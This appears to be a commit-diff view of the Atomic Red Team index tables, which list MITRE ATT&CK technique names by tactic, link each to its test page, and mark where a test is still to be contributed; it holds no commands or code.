| | | [Re-opened Applications](./T1164/T1164.md) | | [Launchctl](./T1152/T1152.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | [Startup Items](./T1165/T1165.md) | | [Plist Modification](./T1150/T1150.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | [Disabling Security Tools](./T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Prompt](./T1141/T1141.md) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | [Launch Agent](./T1159/T1159.md) | [Sudo](./T1169/T1169.md) | [File Deletion](./T1107/T1107.md) | [Keychain](./T1142/T1142.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Launch Daemon](./T1160/T1160.md) | [Sudo Caching](./T1206/T1206.md) | [File Permissions Modification](./T1222/T1222.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](./T1144/T1144.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | [Screen Capture](./T1113/T1113.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Trap](./T1154/T1154.md) | [Local Job Scheduling](./T1168/T1168.md) | [Web Shell](./T1100/T1100.md) | [HISTCONTROL](./T1148/T1148.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Hidden Files and Directories](./T1158/T1158.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Logon Scripts](./T1037/T1037.md) | | [Hidden Users](./T1147/T1147.md) | | [System Information Discovery](./T1082/T1082.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Plist Modification](./T1150/T1150.md) | | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Rc.common](./T1163/T1163.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Re-opened Applications](./T1164/T1164.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | [Remote File Copy](./T1105/T1105.md) |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Launchctl](./T1152/T1152.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Startup Items](./T1165/T1165.md) | | [Masquerading](./T1036/T1036.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Plist Modification](./T1150/T1150.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Web Shell](./T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | |
atomics/matrix.md
+60 -56
View File
@@ -3,64 +3,68 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | [Application Window Discovery](./T1010/T1010.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Account Manipulation](./T1098/T1098.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote File Copy](./T1105/T1105.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Capture](./T1056/T1056.md) | [Permission Groups Discovery](./T1069/T1069.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Prompt](./T1141/T1141.md) | [Process Discovery](./T1057/T1057.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [DCShadow](./T1207/T1207.md) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](./T1012/T1012.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Launchctl](./T1152/T1152.md) | [Component Object Model Hijacking](./T1122/T1122.md) | [Image File Execution Options Injection](./T1183/T1183.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](./T1142/T1142.md) | [Remote System Discovery](./T1018/T1018.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [New Service](./T1050/T1050.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Network Sniffing](./T1040/T1040.md) | [System Information Discovery](./T1082/T1082.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Password Filter DLL](./T1174/T1174.md) | [System Network Configuration Discovery](./T1016/T1016.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](./T1145/T1145.md) | [System Network Connections Discovery](./T1049/T1049.md) | [Windows Remote Management](./T1028/T1028.md) | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvr32](./T1117/T1117.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | [File Deletion](./T1107/T1107.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](./T1007/T1007.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | | [System Time Discovery](./T1124/T1124.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | [Scheduled Task](./T1053/T1053.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](./T1144/T1144.md) | | | | | | |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | [Source](./T1153/T1153.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo](./T1169/T1169.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
| | [Space after Filename](./T1151/T1151.md) | [Launch Agent](./T1159/T1159.md) | [Sudo Caching](./T1206/T1206.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Trap](./T1154/T1154.md) | [Launchctl](./T1152/T1152.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](./T1168/T1168.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [Logon Scripts](./T1037/T1037.md) | | [Indirect Command Execution](./T1202/T1202.md) | | | | | | |
| | [Windows Remote Management](./T1028/T1028.md) | [Modify Existing Service](./T1031/T1031.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | [XSL Script Processing](./T1220/T1220.md) | [Netsh Helper DLL](./T1128/T1128.md) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | [New Service](./T1050/T1050.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Office Application Startup](./T1137/T1137.md) | | [Launchctl](./T1152/T1152.md) | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | | | | | |
| | | [Plist Modification](./T1150/T1150.md) | | [Modify Registry](./T1112/T1112.md) | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | [Rc.common](./T1163/T1163.md) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
| | | [Re-opened Applications](./T1164/T1164.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Plist Modification](./T1150/T1150.md) | | | | | | |
| | | [Registry Run Keys / Startup Folder](./T1060/T1060.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Screensaver](./T1180/T1180.md) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | [Security Support Provider](./T1101/T1101.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | [Startup Items](./T1165/T1165.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | [Trap](./T1154/T1154.md) | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Account Manipulation](./T1098/T1098.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | Domain Trust Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
